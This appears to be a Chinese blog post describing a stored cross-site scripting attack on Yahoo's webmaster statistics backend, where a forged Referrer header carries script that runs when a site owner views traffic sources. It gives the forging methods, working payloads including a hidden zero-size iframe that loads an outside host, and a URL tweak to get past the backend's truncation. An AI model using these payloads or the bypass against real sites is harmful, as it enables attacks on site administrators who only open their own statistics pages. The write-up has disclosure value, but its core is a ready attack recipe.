概述:利用雅虎站长工具后台过滤不严,伪造Referrer插入恶意脚本,可以直接攻击网站站长(如果网站站长看了当天的统计)。
伪造Referrer主要有两种方法
- 本地搭建IIS,在hosts文件里可以将替罪羊的域名绑定到本地,然后用替罪羊的域名访问本地的IIS。(本次测试我们用http://www.2.com)
- 使用程序实现伪造Referrer,详细实现可以Google。
测试过程
新建任意html文件,插入如下内容
<a href="需要攻击的站点">test</a>
通过对应的域名访问此网页,在网页后面加入我们需要插入的恶意代码,并点击test访问目标页面。例如
http://www.2.com/test.html?p=<script>alert('hi,benben')</script>
http://www.2.com/test.html?p=<iframe src="http://blog.119797.com" width=0 height=0></iframe> 当网站管理员登陆雅虎站长工具查看相关数据的时候,就会执行我们的javascript代码了。访问站长工具的详细来源分析,发现包含的页面404了?检查了下源代码才发现后台把代码截取了,没事我们修改下插入Url,修改后如下
http://a/?<iframe src="http://blog.119797.com" width=0 height=0></iframe>
再次访问后台,发现代码已经插入,截图如下:
顺便提供一个检查Referrer的地址,你们可以先把攻击地址填写到这里看插入的恶意代码是否正常。
http://blog.119797.com/referer.aspx